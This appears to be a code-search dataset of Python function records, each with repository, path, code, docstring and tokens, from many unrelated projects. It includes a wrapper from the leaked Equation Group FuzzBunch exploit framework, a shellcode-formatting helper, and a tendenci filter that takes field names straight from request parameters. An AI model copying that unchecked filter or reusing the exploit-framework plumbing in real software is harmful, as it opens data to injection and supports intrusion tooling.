def find_option_by_value(self, value): """ Find ``<option>`` elements by their value. Returns an instance of :class:`ElementList <splinter.element_list.ElementList>` Arguments: value (str): value to use in the search query. """ raise NotImplementedError( "%s doesn't support finding options by value." % self.driver_name )
[ "def", "find_option_by_value", "(", "self", ",", "value", ")", ":", "raise", "NotImplementedError", "(", "\"%s doesn't support finding options by value.\"", "%", "self", ".", "driver_name", ")" ]
https://github.com/cobrateam/splinter/blob/a3f30f53d886709e60218e46b521cbd87e9caadd/splinter/driver/__init__.py#L278-L289
PythonCharmers/python-future
80523f383fbba1c6de0551e19d0277e73e69573c
src/future/backports/urllib/request.py
python
parse_http_list
(s)
return [part.strip() for part in res]
Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Neither commas nor quotes count if they are escaped. Only double-quotes count, not single-quotes.
Parse lists as described by RFC 2068 Section 2.
[ "Parse", "lists", "as", "described", "by", "RFC", "2068", "Section", "2", "." ]
def parse_http_list(s): """Parse lists as described by RFC 2068 Section 2. In particular, parse comma-separated lists where the elements of the list may include quoted-strings. A quoted-string could contain a comma. A non-quoted string could have quotes in the middle. Neither commas nor quotes count if they are escaped. Only double-quotes count, not single-quotes. """ res = [] part = '' escape = quote = False for cur in s: if escape: part += cur escape = False continue if quote: if cur == '\\': escape = True continue elif cur == '"': quote = False part += cur continue if cur == ',': res.append(part) part = '' continue if cur == '"': quote = True part += cur # append last part if part: res.append(part) return [part.strip() for part in res]
[ "def", "parse_http_list", "(", "s", ")", ":", "res", "=", "[", "]", "part", "=", "''", "escape", "=", "quote", "=", "False", "for", "cur", "in", "s", ":", "if", "escape", ":", "part", "+=", "cur", "escape", "=", "False", "continue", "if", "quote", ...
https://github.com/PythonCharmers/python-future/blob/80523f383fbba1c6de0551e19d0277e73e69573c/src/future/backports/urllib/request.py#L1371-L1412
tendenci/tendenci
0f2c348cc0e7d41bc56f50b00ce05544b083bf1d
tendenci/apps/newsletters/forms.py
python
MarketingStep2EmailFilterForm.filter_email
(self, request, queryset)
return queryset
[]
def filter_email(self, request, queryset): search_criteria = request.GET.get('search_criteria') q = request.GET.get('q') query = {search_criteria: q} queryset = queryset.filter(**query) return queryset
[ "def", "filter_email", "(", "self", ",", "request", ",", "queryset", ")", ":", "search_criteria", "=", "request", ".", "GET", ".", "get", "(", "'search_criteria'", ")", "q", "=", "request", ".", "GET", ".", "get", "(", "'q'", ")", "query", "=", "{", ...
https://github.com/tendenci/tendenci/blob/0f2c348cc0e7d41bc56f50b00ce05544b083bf1d/tendenci/apps/newsletters/forms.py#L249-L255
pymeasure/pymeasure
b4d888e9ead85ef7f7af0031f2dbb44c9ce1825e
pymeasure/instruments/srs/sr570.py
python
SR570.blank_front
(self)
Blanks the frontend output of the device
Blanks the frontend output of the device
[ "Blanks", "the", "frontend", "output", "of", "the", "device" ]
def blank_front(self): """"Blanks the frontend output of the device""" self.front_blanked = True
[ "def", "blank_front", "(", "self", ")", ":", "self", ".", "front_blanked", "=", "True" ]
https://github.com/pymeasure/pymeasure/blob/b4d888e9ead85ef7f7af0031f2dbb44c9ce1825e/pymeasure/instruments/srs/sr570.py#L202-L204
shekkizh/TensorflowProjects
5bd5563a5310df0b87725d989e84d49da0ea8c00
Misc/Deblurring.py
python
read_cifar10
(filename_queue)
return result
[]
def read_cifar10(filename_queue): class CIFAR10Record(object): pass result = CIFAR10Record() # Dimensions of the images in the CIFAR-10 dataset. # See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the # input format. label_bytes = 1 # 2 for CIFAR-100 result.height = IMAGE_SIZE result.width = IMAGE_SIZE result.depth = 3 image_bytes = result.height * result.width * result.depth # Every record consists of a label followed by the image, with a # fixed number of bytes for each. record_bytes = label_bytes + image_bytes # Read a record, getting filenames from the filename_queue. No # header or footer in the CIFAR-10 format, so we leave header_bytes # and footer_bytes at their default of 0. reader = tf.FixedLengthRecordReader(record_bytes=record_bytes) result.key, value = reader.read(filename_queue) # Convert from a string to a vector of uint8 that is record_bytes long. record_bytes = tf.decode_raw(value, tf.uint8) # # The first bytes represent the label, which we convert from uint8->int32. # result.label = tf.cast( # tf.slice(record_bytes, [0], [label_bytes]), tf.int32) # The remaining bytes after the label represent the image, which we reshape # from [depth * height * width] to [depth, height, width]. depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]), [result.depth, result.height, result.width]) # Convert from [depth, height, width] to [height, width, depth]. result.uint8image = tf.transpose(depth_major, [1, 2, 0]) image4d = tf.cast(tf.reshape(result.uint8image, [-1, result.height, result.width, result.depth]), dtype=tf.float32) W = tf.truncated_normal((5, 5, 3, 3), stddev=tf.random_uniform([1])) result.noise_image = tf.reshape(conv2d_basic(image4d, W), [result.height, result.width, result.depth]) return result
[ "def", "read_cifar10", "(", "filename_queue", ")", ":", "class", "CIFAR10Record", "(", "object", ")", ":", "pass", "result", "=", "CIFAR10Record", "(", ")", "# Dimensions of the images in the CIFAR-10 dataset.", "# See http://www.cs.toronto.edu/~kriz/cifar.html for a descriptio...
https://github.com/shekkizh/TensorflowProjects/blob/5bd5563a5310df0b87725d989e84d49da0ea8c00/Misc/Deblurring.py#L73-L114
MeanEYE/Sunflower
1024bbdde3b8e202ddad3553b321a7b6230bffc9
sunflower/plugin_base/item_list.py
python
ItemList._clear_list
(self)
Abstract method for clearing item list
Abstract method for clearing item list
[ "Abstract", "method", "for", "clearing", "item", "list" ]
def _clear_list(self): """Abstract method for clearing item list""" pass
[ "def", "_clear_list", "(", "self", ")", ":", "pass" ]
https://github.com/MeanEYE/Sunflower/blob/1024bbdde3b8e202ddad3553b321a7b6230bffc9/sunflower/plugin_base/item_list.py#L1046-L1048
kbandla/ImmunityDebugger
2abc03fb15c8f3ed0914e1175c4d8933977c73e3
1.84/Libs/x86smt/solver_cvc3.py
python
Solver.UConstFromExpr
(self, exp)
return tmp
return an unsigned long from a CONSTANT BITVECTOR expression
return an unsigned long from a CONSTANT BITVECTOR expression
[ "return", "an", "unsigned", "long", "from", "a", "CONSTANT", "BITVECTOR", "expression" ]
def UConstFromExpr(self, exp): """return an unsigned long from a CONSTANT BITVECTOR expression""" if self.getKind(exp) != self._BVCONST: return None tmp = int(self.exprString(exp)[4:], 2) return tmp
[ "def", "UConstFromExpr", "(", "self", ",", "exp", ")", ":", "if", "self", ".", "getKind", "(", "exp", ")", "!=", "self", ".", "_BVCONST", ":", "return", "None", "tmp", "=", "int", "(", "self", ".", "exprString", "(", "exp", ")", "[", "4", ":", "]...
https://github.com/kbandla/ImmunityDebugger/blob/2abc03fb15c8f3ed0914e1175c4d8933977c73e3/1.84/Libs/x86smt/solver_cvc3.py#L680-L685
IJDykeman/wangTiles
7c1ee2095ebdf7f72bce07d94c6484915d5cae8b
experimental_code/tiles_3d/venv_mac_py3/lib/python2.7/site-packages/pip/_vendor/requests/utils.py
python
unquote_header_value
(value, is_filename=False)
return value
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting.
[ "r", "Unquotes", "a", "header", "value", ".", "(", "Reversal", "of", ":", "func", ":", "quote_header_value", ")", ".", "This", "does", "not", "use", "the", "real", "unquoting", "but", "what", "browsers", "are", "actually", "using", "for", "quoting", "." ]
def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. :rtype: str """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != '\\\\': return value.replace('\\\\', '\\').replace('\\"', '"') return value
[ "def", "unquote_header_value", "(", "value", ",", "is_filename", "=", "False", ")", ":", "if", "value", "and", "value", "[", "0", "]", "==", "value", "[", "-", "1", "]", "==", "'\"'", ":", "# this is not the real unquoting, but fixing this so that the", "# RFC i...
https://github.com/IJDykeman/wangTiles/blob/7c1ee2095ebdf7f72bce07d94c6484915d5cae8b/experimental_code/tiles_3d/venv_mac_py3/lib/python2.7/site-packages/pip/_vendor/requests/utils.py#L377-L399
ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework
cb692f527e4e819b6c228187c5702d990a180043
bin/x86/Debug/scripting_engine/Lib/lib2to3/pytree.py
python
BasePattern.generate_matches
(self, nodes)
Generator yielding all matches for this pattern. Default implementation for non-wildcard patterns.
Generator yielding all matches for this pattern.
[ "Generator", "yielding", "all", "matches", "for", "this", "pattern", "." ]
def generate_matches(self, nodes): """ Generator yielding all matches for this pattern. Default implementation for non-wildcard patterns. """ r = {} if nodes and self.match(nodes[0], r): yield 1, r
[ "def", "generate_matches", "(", "self", ",", "nodes", ")", ":", "r", "=", "{", "}", "if", "nodes", "and", "self", ".", "match", "(", "nodes", "[", "0", "]", ",", "r", ")", ":", "yield", "1", ",", "r" ]
https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/cb692f527e4e819b6c228187c5702d990a180043/bin/x86/Debug/scripting_engine/Lib/lib2to3/pytree.py#L523-L531
scikit-learn/scikit-learn
1d1aadd0711b87d2a11c80aad15df6f8cf156712
sklearn/cluster/_kmeans.py
python
_kmeans_single_elkan
( X, sample_weight, centers_init, max_iter=300, verbose=False, x_squared_norms=None, tol=1e-4, n_threads=1, )
return labels, inertia, centers, i + 1
A single run of k-means elkan, assumes preparation completed prior. Parameters ---------- X : {ndarray, sparse matrix} of shape (n_samples, n_features) The observations to cluster. If sparse matrix, must be in CSR format. sample_weight : array-like of shape (n_samples,) The weights for each observation in X. centers_init : ndarray of shape (n_clusters, n_features) The initial centers. max_iter : int, default=300 Maximum number of iterations of the k-means algorithm to run. verbose : bool, default=False Verbosity mode. x_squared_norms : array-like, default=None Precomputed x_squared_norms. tol : float, default=1e-4 Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence. It's not advised to set `tol=0` since convergence might never be declared due to rounding errors. Use a very small number instead. n_threads : int, default=1 The number of OpenMP threads to use for the computation. Parallelism is sample-wise on the main cython loop which assigns each sample to its closest center. Returns ------- centroid : ndarray of shape (n_clusters, n_features) Centroids found at the last iteration of k-means. label : ndarray of shape (n_samples,) label[i] is the code or index of the centroid the i'th observation is closest to. inertia : float The final value of the inertia criterion (sum of squared distances to the closest centroid for all observations in the training set). n_iter : int Number of iterations run.
A single run of k-means elkan, assumes preparation completed prior.
[ "A", "single", "run", "of", "k", "-", "means", "elkan", "assumes", "preparation", "completed", "prior", "." ]
def _kmeans_single_elkan( X, sample_weight, centers_init, max_iter=300, verbose=False, x_squared_norms=None, tol=1e-4, n_threads=1, ): """A single run of k-means elkan, assumes preparation completed prior. Parameters ---------- X : {ndarray, sparse matrix} of shape (n_samples, n_features) The observations to cluster. If sparse matrix, must be in CSR format. sample_weight : array-like of shape (n_samples,) The weights for each observation in X. centers_init : ndarray of shape (n_clusters, n_features) The initial centers. max_iter : int, default=300 Maximum number of iterations of the k-means algorithm to run. verbose : bool, default=False Verbosity mode. x_squared_norms : array-like, default=None Precomputed x_squared_norms. tol : float, default=1e-4 Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence. It's not advised to set `tol=0` since convergence might never be declared due to rounding errors. Use a very small number instead. n_threads : int, default=1 The number of OpenMP threads to use for the computation. Parallelism is sample-wise on the main cython loop which assigns each sample to its closest center. Returns ------- centroid : ndarray of shape (n_clusters, n_features) Centroids found at the last iteration of k-means. label : ndarray of shape (n_samples,) label[i] is the code or index of the centroid the i'th observation is closest to. inertia : float The final value of the inertia criterion (sum of squared distances to the closest centroid for all observations in the training set). n_iter : int Number of iterations run. """ n_samples = X.shape[0] n_clusters = centers_init.shape[0] # Buffers to avoid new allocations at each iteration. centers = centers_init centers_new = np.zeros_like(centers) weight_in_clusters = np.zeros(n_clusters, dtype=X.dtype) labels = np.full(n_samples, -1, dtype=np.int32) labels_old = labels.copy() center_half_distances = euclidean_distances(centers) / 2 distance_next_center = np.partition( np.asarray(center_half_distances), kth=1, axis=0 )[1] upper_bounds = np.zeros(n_samples, dtype=X.dtype) lower_bounds = np.zeros((n_samples, n_clusters), dtype=X.dtype) center_shift = np.zeros(n_clusters, dtype=X.dtype) if sp.issparse(X): init_bounds = init_bounds_sparse elkan_iter = elkan_iter_chunked_sparse _inertia = _inertia_sparse else: init_bounds = init_bounds_dense elkan_iter = elkan_iter_chunked_dense _inertia = _inertia_dense init_bounds(X, centers, center_half_distances, labels, upper_bounds, lower_bounds) strict_convergence = False for i in range(max_iter): elkan_iter( X, sample_weight, centers, centers_new, weight_in_clusters, center_half_distances, distance_next_center, upper_bounds, lower_bounds, labels, center_shift, n_threads, ) # compute new pairwise distances between centers and closest other # center of each center for next iterations center_half_distances = euclidean_distances(centers_new) / 2 distance_next_center = np.partition( np.asarray(center_half_distances), kth=1, axis=0 )[1] if verbose: inertia = _inertia(X, sample_weight, centers, labels, n_threads) print(f"Iteration {i}, inertia {inertia}") centers, centers_new = centers_new, centers if np.array_equal(labels, labels_old): # First check the labels for strict convergence. if verbose: print(f"Converged at iteration {i}: strict convergence.") strict_convergence = True break else: # No strict convergence, check for tol based convergence. center_shift_tot = (center_shift ** 2).sum() if center_shift_tot <= tol: if verbose: print( f"Converged at iteration {i}: center shift " f"{center_shift_tot} within tolerance {tol}." ) break labels_old[:] = labels if not strict_convergence: # rerun E-step so that predicted labels match cluster centers elkan_iter( X, sample_weight, centers, centers, weight_in_clusters, center_half_distances, distance_next_center, upper_bounds, lower_bounds, labels, center_shift, n_threads, update_centers=False, ) inertia = _inertia(X, sample_weight, centers, labels, n_threads) return labels, inertia, centers, i + 1
[ "def", "_kmeans_single_elkan", "(", "X", ",", "sample_weight", ",", "centers_init", ",", "max_iter", "=", "300", ",", "verbose", "=", "False", ",", "x_squared_norms", "=", "None", ",", "tol", "=", "1e-4", ",", "n_threads", "=", "1", ",", ")", ":", "n_sam...
https://github.com/scikit-learn/scikit-learn/blob/1d1aadd0711b87d2a11c80aad15df6f8cf156712/sklearn/cluster/_kmeans.py#L390-L548
PokemonGoF/PokemonGo-Bot-Desktop
4bfa94f0183406c6a86f93645eff7abd3ad4ced8
build/pywin/Lib/multiprocessing/util.py
python
Finalize.cancel
(self)
Cancel finalization of the object
Cancel finalization of the object
[ "Cancel", "finalization", "of", "the", "object" ]
def cancel(self): ''' Cancel finalization of the object ''' try: del _finalizer_registry[self._key] except KeyError: pass else: self._weakref = self._callback = self._args = \ self._kwargs = self._key = None
[ "def", "cancel", "(", "self", ")", ":", "try", ":", "del", "_finalizer_registry", "[", "self", ".", "_key", "]", "except", "KeyError", ":", "pass", "else", ":", "self", ".", "_weakref", "=", "self", ".", "_callback", "=", "self", ".", "_args", "=", "...
https://github.com/PokemonGoF/PokemonGo-Bot-Desktop/blob/4bfa94f0183406c6a86f93645eff7abd3ad4ced8/build/pywin/Lib/multiprocessing/util.py#L212-L222
spulec/moto
a688c0032596a7dfef122b69a08f2bec3be2e481
scripts/update_managed_policies.py
python
json_serial
(obj)
JSON serializer for objects not serializable by default json code
JSON serializer for objects not serializable by default json code
[ "JSON", "serializer", "for", "objects", "not", "serializable", "by", "default", "json", "code" ]
def json_serial(obj): """JSON serializer for objects not serializable by default json code""" if isinstance(obj, datetime): serial = obj.isoformat() return serial raise TypeError("Type not serializable")
[ "def", "json_serial", "(", "obj", ")", ":", "if", "isinstance", "(", "obj", ",", "datetime", ")", ":", "serial", "=", "obj", ".", "isoformat", "(", ")", "return", "serial", "raise", "TypeError", "(", "\"Type not serializable\"", ")" ]
https://github.com/spulec/moto/blob/a688c0032596a7dfef122b69a08f2bec3be2e481/scripts/update_managed_policies.py#L17-L23
PaddlePaddle/PaddleX
2bab73f81ab54e328204e7871e6ae4a82e719f5d
static/paddlex/cv/nets/__init__.py
python
darknet53
(input, num_classes=1000)
return model(input)
[]
def darknet53(input, num_classes=1000): model = DarkNet(depth=53, num_classes=num_classes, bn_act='relu') return model(input)
[ "def", "darknet53", "(", "input", ",", "num_classes", "=", "1000", ")", ":", "model", "=", "DarkNet", "(", "depth", "=", "53", ",", "num_classes", "=", "num_classes", ",", "bn_act", "=", "'relu'", ")", "return", "model", "(", "input", ")" ]
https://github.com/PaddlePaddle/PaddleX/blob/2bab73f81ab54e328204e7871e6ae4a82e719f5d/static/paddlex/cv/nets/__init__.py#L79-L81
tp4a/teleport
1fafd34f1f775d2cf80ea4af6e44468d8e0b24ad
server/www/packages/packages-darwin/x64/pyasn1/type/namedtype.py
python
NamedTypes.getTypeByPosition
(self, idx)
Return ASN.1 type object by its position in fields set. Parameters ---------- idx: :py:class:`int` Field index Returns ------- : ASN.1 type Raises ------ : :class:`~pyasn1.error.PyAsn1Error` If given position is out of fields range
Return ASN.1 type object by its position in fields set.
[ "Return", "ASN", ".", "1", "type", "object", "by", "its", "position", "in", "fields", "set", "." ]
def getTypeByPosition(self, idx): """Return ASN.1 type object by its position in fields set. Parameters ---------- idx: :py:class:`int` Field index Returns ------- : ASN.1 type Raises ------ : :class:`~pyasn1.error.PyAsn1Error` If given position is out of fields range """ try: return self.__namedTypes[idx].asn1Object except IndexError: raise error.PyAsn1Error('Type position out of range')
[ "def", "getTypeByPosition", "(", "self", ",", "idx", ")", ":", "try", ":", "return", "self", ".", "__namedTypes", "[", "idx", "]", ".", "asn1Object", "except", "IndexError", ":", "raise", "error", ".", "PyAsn1Error", "(", "'Type position out of range'", ")" ]
https://github.com/tp4a/teleport/blob/1fafd34f1f775d2cf80ea4af6e44468d8e0b24ad/server/www/packages/packages-darwin/x64/pyasn1/type/namedtype.py#L281-L303
JoinMarket-Org/joinmarket-clientserver
8b3d21f226185e31aa10e8e16cdfc719cea4a98e
jmclient/jmclient/wallet.py
python
FidelityBondMixin.add_burner_output
(self, path, txhex, block_height, merkle_branch, block_index, write=True)
merkle_branch = None means it was unavailable because of pruning
merkle_branch = None means it was unavailable because of pruning
[ "merkle_branch", "=", "None", "means", "it", "was", "unavailable", "because", "of", "pruning" ]
def add_burner_output(self, path, txhex, block_height, merkle_branch, block_index, write=True): """ merkle_branch = None means it was unavailable because of pruning """ if self._BURNER_OUTPUT_STORAGE_KEY not in self._storage.data: self._storage.data[self._BURNER_OUTPUT_STORAGE_KEY] = {} path = path.encode() txhex = unhexlify(txhex) if not merkle_branch: merkle_branch = self.MERKLE_BRANCH_UNAVAILABLE self._storage.data[self._BURNER_OUTPUT_STORAGE_KEY][path] = [txhex, block_height, merkle_branch, block_index] if write: self._storage.save()
[ "def", "add_burner_output", "(", "self", ",", "path", ",", "txhex", ",", "block_height", ",", "merkle_branch", ",", "block_index", ",", "write", "=", "True", ")", ":", "if", "self", ".", "_BURNER_OUTPUT_STORAGE_KEY", "not", "in", "self", ".", "_storage", "."...
https://github.com/JoinMarket-Org/joinmarket-clientserver/blob/8b3d21f226185e31aa10e8e16cdfc719cea4a98e/jmclient/jmclient/wallet.py#L2509-L2523
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/_core/anndata.py
python
AnnData.varm_keys
(self)
return list(self._varm.keys())
List keys of variable annotation :attr:`varm`.
List keys of variable annotation :attr:`varm`.
[ "List", "keys", "of", "variable", "annotation", ":", "attr", ":", "varm", "." ]
def varm_keys(self) -> List[str]: """List keys of variable annotation :attr:`varm`.""" return list(self._varm.keys())
[ "def", "varm_keys", "(", "self", ")", "->", "List", "[", "str", "]", ":", "return", "list", "(", "self", ".", "_varm", ".", "keys", "(", ")", ")" ]
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/_core/anndata.py#L1013-L1015
blasty/moneyshot
0541356cca38e57ec03a30b6dff1d38c0c7dfd00
outputter.py
python
python
(buf, array_name = 'shellcode', row_width = 16, fancy = False)
return out
[]
def python(buf, array_name = 'shellcode', row_width = 16, fancy = False): lines = [] out = "" for i in range(0, len(buf), row_width): j = 0 linebuf = '' while (j < row_width and (i+j) < len(buf)): linebuf += "\\x%02x" % ( ord(buf[i+j]) ) j = j + 1 lines.append(linebuf); for i in range(0, len(lines)-1): if fancy: if i == 0: out += array_name + " = " + colors.bold() + colors.fg('magenta') + "\"" else: out += array_name + " += " + colors.bold() + colors.fg('magenta') + "\"" out += colors.fg("red") + lines[i] out += colors.fg('magenta') + "\"\n" + colors.end() else: if i == 0: out += array_name + " = \"%s\"\n" % ( lines[i] ) else: out += array_name + " += \"%s\"\n" % ( lines[i] ) if fancy: out += array_name + " += " + colors.bold() + colors.fg('magenta') + "\"" out += colors.fg("red") + lines[len(lines)-1] out += colors.fg('magenta') + "\"" + colors.end() + ";" out += "\n\n" # out += "\t\"%s\";\n\n" % ( lines[len(lines)-1] ) else: out += array_name + " += \"%s\";\n\n" % ( lines[len(lines)-1] ) return out
[ "def", "python", "(", "buf", ",", "array_name", "=", "'shellcode'", ",", "row_width", "=", "16", ",", "fancy", "=", "False", ")", ":", "lines", "=", "[", "]", "out", "=", "\"\"", "for", "i", "in", "range", "(", "0", ",", "len", "(", "buf", ")", ...
https://github.com/blasty/moneyshot/blob/0541356cca38e57ec03a30b6dff1d38c0c7dfd00/outputter.py#L256-L293
akanimax/T2F
e0fc1876b9ecac22be294fefd85234ddf365549c
implementation/networks/InferSent/encoder/models.py
python
ClassificationNet.encode
(self, s1)
return emb
[]
def encode(self, s1): emb = self.encoder(s1) return emb
[ "def", "encode", "(", "self", ",", "s1", ")", ":", "emb", "=", "self", ".", "encoder", "(", "s1", ")", "return", "emb" ]
https://github.com/akanimax/T2F/blob/e0fc1876b9ecac22be294fefd85234ddf365549c/implementation/networks/InferSent/encoder/models.py#L890-L892
econ-ark/HARK
9562cafef854d9c3d6b4aba2540e3e442ba6ec6c
HARK/ConsumptionSaving/ConsAggShockModel.py
python
KrusellSmithEconomy.reset
(self)
Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset().
Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset().
[ "Reset", "the", "economy", "to", "prepare", "for", "a", "new", "simulation", ".", "Sets", "the", "time", "index", "of", "aggregate", "shocks", "to", "zero", "and", "runs", "Market", ".", "reset", "()", "." ]
def reset(self): """ Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset(). """ self.Shk_idx = 0 Market.reset(self)
[ "def", "reset", "(", "self", ")", ":", "self", ".", "Shk_idx", "=", "0", "Market", ".", "reset", "(", "self", ")" ]
https://github.com/econ-ark/HARK/blob/9562cafef854d9c3d6b4aba2540e3e442ba6ec6c/HARK/ConsumptionSaving/ConsAggShockModel.py#L2886-L2892
LabPy/lantz
3e878e3f765a4295b0089d04e241d4beb7b8a65b
lantz/drivers/ni/daqmx/base.py
python
Task.configure_trigger_analog_edge_start
(self, source, slope='rising', level=1.0)
Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify. :param source: The name of a channel or terminal where there is an analog signal to use as the source of the trigger. For E Series devices, if you use a channel name, the channel must be the first channel in the task. The only terminal you can use for E Series devices is PFI0. :param slope: Specifies on which slope of the signal to start acquiring or generating samples when the signal crosses trigger level: 'rising' - Trigger on the rising slope of the signal. 'falling' - Trigger on the falling slope of the signal. :param level: The threshold at which to start acquiring or generating samples. Specify this value in the units of the measurement or generation. Use trigger slope to specify on which slope to trigger at this threshold.
Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify.
[ "Configures", "the", "task", "to", "start", "acquiring", "or", "generating", "samples", "when", "an", "analog", "signal", "crosses", "the", "level", "you", "specify", "." ]
def configure_trigger_analog_edge_start(self, source, slope='rising', level=1.0): """ Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify. :param source: The name of a channel or terminal where there is an analog signal to use as the source of the trigger. For E Series devices, if you use a channel name, the channel must be the first channel in the task. The only terminal you can use for E Series devices is PFI0. :param slope: Specifies on which slope of the signal to start acquiring or generating samples when the signal crosses trigger level: 'rising' - Trigger on the rising slope of the signal. 'falling' - Trigger on the falling slope of the signal. :param level: The threshold at which to start acquiring or generating samples. Specify this value in the units of the measurement or generation. Use trigger slope to specify on which slope to trigger at this threshold. """ self.lib.CfgAnlgEdgeStartTrig(source, slope, level)
[ "def", "configure_trigger_analog_edge_start", "(", "self", ",", "source", ",", "slope", "=", "'rising'", ",", "level", "=", "1.0", ")", ":", "self", ".", "lib", ".", "CfgAnlgEdgeStartTrig", "(", "source", ",", "slope", ",", "level", ")" ]
https://github.com/LabPy/lantz/blob/3e878e3f765a4295b0089d04e241d4beb7b8a65b/lantz/drivers/ni/daqmx/base.py#L873-L903
git-cola/git-cola
b48b8028e0c3baf47faf7b074b9773737358163d
cola/widgets/toolbar.py
python
ToolbarTreeWidget.__init__
(self, parent)
[]
def __init__(self, parent): standard.TreeView.__init__(self, parent) self.setDragEnabled(True) self.setDragDropMode(QtWidgets.QAbstractItemView.DragOnly) self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection) self.setDropIndicatorShown(True) self.setRootIsDecorated(True) self.setHeaderHidden(True) self.setAlternatingRowColors(False) self.setSortingEnabled(False) self.setModel(QtGui.QStandardItemModel())
[ "def", "__init__", "(", "self", ",", "parent", ")", ":", "standard", ".", "TreeView", ".", "__init__", "(", "self", ",", "parent", ")", "self", ".", "setDragEnabled", "(", "True", ")", "self", ".", "setDragDropMode", "(", "QtWidgets", ".", "QAbstractItemVi...
https://github.com/git-cola/git-cola/blob/b48b8028e0c3baf47faf7b074b9773737358163d/cola/widgets/toolbar.py#L517-L529
mfarragher/appelpy
6ba8b123abb8b4e9d5968841b8ce9eb5088d763b
appelpy/linear_model.py
python
WLS.results
(self)
return self._results
statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information. For a neater summary of the model, use these class attributes: - results_output: the object returned by results.summary() - model_selection_stats: an assortment of measures contained in results, which are used commonly for model selection (e.g. AIC, R-squared)
statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information.
[ "statsmodels", ".", "regression", ".", "linear_model", ".", "RegressionResultsWrapper", "object", "The", "object", "contains", "many", "details", "on", "the", "fit", "of", "the", "regression", "model", ".", "There", "are", "dozens", "of", "attributes", "that", "...
def results(self): """statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information. For a neater summary of the model, use these class attributes: - results_output: the object returned by results.summary() - model_selection_stats: an assortment of measures contained in results, which are used commonly for model selection (e.g. AIC, R-squared) """ return self._results
[ "def", "results", "(", "self", ")", ":", "return", "self", ".", "_results" ]
https://github.com/mfarragher/appelpy/blob/6ba8b123abb8b4e9d5968841b8ce9eb5088d763b/appelpy/linear_model.py#L203-L214
x0rz/EQGRP_Lost_in_Translation
6692b1486f562f027567a49523b8c151a4050988
windows/fuzzbunch/coli.py
python
CommandlineWrapper.__call__
(self, argv)
Effectively "main" from Commandlinewrapper
Effectively "main" from Commandlinewrapper
[ "Effectively", "main", "from", "Commandlinewrapper" ]
def __call__(self, argv): """Effectively "main" from Commandlinewrapper""" logConfig = None context = {} rendezvous = None try: (opts, args) = self.__coli_parser.parse_args(argv) if opts.InConfig is None: raise ExploitConfigError("You must pass a valid --InConfig option") # Read the input config and create a truanchild Config object self.config = truantchild.Config([opts.InConfig]) # make sure the id from the binary matches the config if self.getID() != self.config.id: print "Mismatching configurations!!" return 1 # XXX Add the bit about help, line 215 inputs = self.config._inputParams outputs= self.config._outputParams constants = None # Fuzzbunch doesn't support these yet #pytrch.Params_parseCommandLine( inputs.parameters, len(sys.argv), sys.argv, doHelp) # Convert the options from Truanchild to easy-to-handle input for the plugin iOptions = self.tc2List( inputs ) oOptions = self.tc2Dict( outputs ) # add the params from the wrapper valid = self.validateParams(iOptions) # XXX Print the invalid options if opts.ValidateOnly is True: return 0 (fhNo, logConfig) = self.processWrapperParams( opts ) # Setup all of the existing sockets self.doRendezvousClient(inputs) retval = self.processParams(iOptions, constants, oOptions, context, logConfig) try: self.options2Tc( oOptions, outputs ) except Exception as e: # If this fails, the plugin was not successful print str(oOptions) print "Failed: {0}".format(e) return 1 # Add the output parameter for the rendezvous (rendezvous, sock) = self.addWrapperOutputParams( outputs, self.config.namespaceUri, self.config.schemaVersion ) exma.writeParamsToEM( fhNo, self.config.getMarshalledInConfig() ) # This sends us into a send/recv loop self.doRendezvousServer( rendezvous, sock ) self.cleanup( EDF_CLEANUP_WAIT, context, logConfig ) except Exception as e: print "Failed: {0}".format(e) raise
[ "def", "__call__", "(", "self", ",", "argv", ")", ":", "logConfig", "=", "None", "context", "=", "{", "}", "rendezvous", "=", "None", "try", ":", "(", "opts", ",", "args", ")", "=", "self", ".", "__coli_parser", ".", "parse_args", "(", "argv", ")", ...
https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/6692b1486f562f027567a49523b8c151a4050988/windows/fuzzbunch/coli.py#L57-L117
gradientinstitute/aboleth
53a3de23dce4d607ffec92be936e83d2dd7ebb3c
aboleth/layers.py
python
EmbedVariational.__init__
(self, output_dim, n_categories, prior_std=1., learn_prior=False, full=False)
Create and instance of a variational dense embedding layer.
Create and instance of a variational dense embedding layer.
[ "Create", "and", "instance", "of", "a", "variational", "dense", "embedding", "layer", "." ]
